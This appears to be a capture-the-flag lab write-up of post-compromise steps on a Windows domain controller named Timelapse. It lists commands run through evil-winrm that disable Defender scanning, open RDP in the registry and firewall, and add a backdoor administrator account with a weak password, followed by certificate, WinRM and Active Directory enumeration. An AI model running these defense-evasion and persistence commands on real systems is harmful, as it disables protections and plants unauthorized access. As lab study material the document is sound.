InfoSec LAB

Timelapse_Beyond

Created: 3 min read

Beyond

This is the beyond page that an additional post enumeration and assessment are conducted as SYSTEM after compromising the target system.

*evil-winrm* ps c:\Users\Administrator\Documents> Set-MpPreference -DisableRealtimeMonitoring $true
*evil-winrm* ps c:\Users\Administrator\Documents> Set-MpPreference -DisableIOAVProtection $true
*evil-winrm* ps c:\Users\Administrator\Documents> Set-MpPreference -DisableScriptScanning 1

Dropping the AV

*evil-winrm* ps c:\Users\Administrator\Documents> cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
 
*evil-winrm* ps c:\Users\Administrator\Documents> cmd /c netsh firewall add portopening TCP 3389 "Remote Desktop"
 
important: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at https://go.microsoft.com/fwlink/?linkid=121488 .
 
Ok.

RDP enabled

*evil-winrm* ps c:\Users\Administrator\Documents> net user adm1n Qwer1234 /ADD ; net localgroup administrators /ADD adm1n
The command completed successfully.
The command completed successfully.
 
*evil-winrm* ps c:\Users\Administrator\Documents> net user low_priv Qwer1234 ; net localgroup "Remote Desktop Users" /ADD low_priv
The command completed successfully.

Creating both low privilege user and admin user for testing

Certificate

Issued for Client Authentication

*Evil-WinRM* PS C:\Users\Administrator\Documents> Get-Service -Name "CertSvc"
Cannot find any service with service name 'CertSvc'.
At line:1 char:1
+ Get-Service -Name "CertSvc"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (CertSvc:String) [Get-Service], ServiceCommandException
    + FullyQualifiedErrorId : NoServiceFoundForGivenName,Microsoft.PowerShell.Commands.GetServiceCommand

AD CS is NOT running on the DC host

It’s not even installed This explains why I was unable request the KDC for a TGT of the legacyy user with the user’s certificate using tools like certipy or PKINITtools

If the Domain Controller (DC) host does not have Active Directory Certificate Services (AD CS) installed, yet a user is able to authenticate to the WinRM service over SSL using an issued certificate, there might be another Certificate Authority (CA) in your network or another mechanism in place for issuing certificates.

Here are a few possible scenarios:

  1. External Certificate Authority: It’s possible that a different CA outside of the DC host (e.g., a dedicated enterprise CA or a public CA) is issuing the certificates used for WinRM authentication. In this case, the DC host doesn’t need to have AD CS installed.
  2. Third-Party Certificate: The certificate used for WinRM authentication might be issued by a third-party CA, and the DC host may trust certificates from this CA.
  3. Custom PKI Solution: Your organization might have a custom Public Key Infrastructure (PKI) solution in place for certificate issuance, and the DC host is configured to trust certificates from this custom PKI.
  4. Self-Signed Certificate: It’s also possible that a self-signed certificate is being used for WinRM authentication. In this case, the DC host, or the client, generates its own self-signed certificate.

WinRM

*evil-winrm* ps c:\Users\Administrator\Documents> winrm get winrm/config/Service
Service
    rootsddl = o:NSG:BAD:P(A;;GA;;;BA)(A;;GR;;;IU)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)
    MaxConcurrentOperations = 4294967295
    MaxConcurrentOperationsPerUser = 1500
    EnumerationTimeoutms = 240000
    MaxConnections = 300
    MaxPacketRetrievalTimeSeconds = 120
    AllowUnencrypted = false
    Auth
        Basic = false
        Kerberos = true
        Negotiate = true
        Certificate = true
        CredSSP = false
        CbtHardeningLevel = Relaxed
    DefaultPorts
        HTTP = 5985
        HTTPS = 5986
    IPv4Filter = *
    IPv6Filter = *
    EnableCompatibilityHttpListener = false
    EnableCompatibilityHttpsListener = false
    CertificateThumbprint
    AllowRemoteAccess = true

Objects

Servers

These OUs respectively contains the 3 domain computer objects; DB01$, DEV01$, and WEB01$ Those are all arbitrary dummy objects

Staff

Admins

Dev

Interestingly, the user’s certificate isn’t listed here This is because the certificate that

Groups

Development

HelpDesk (Group)

LAPS_Readers

HelpDesk (OU)

Interactive Graph View

Backlinks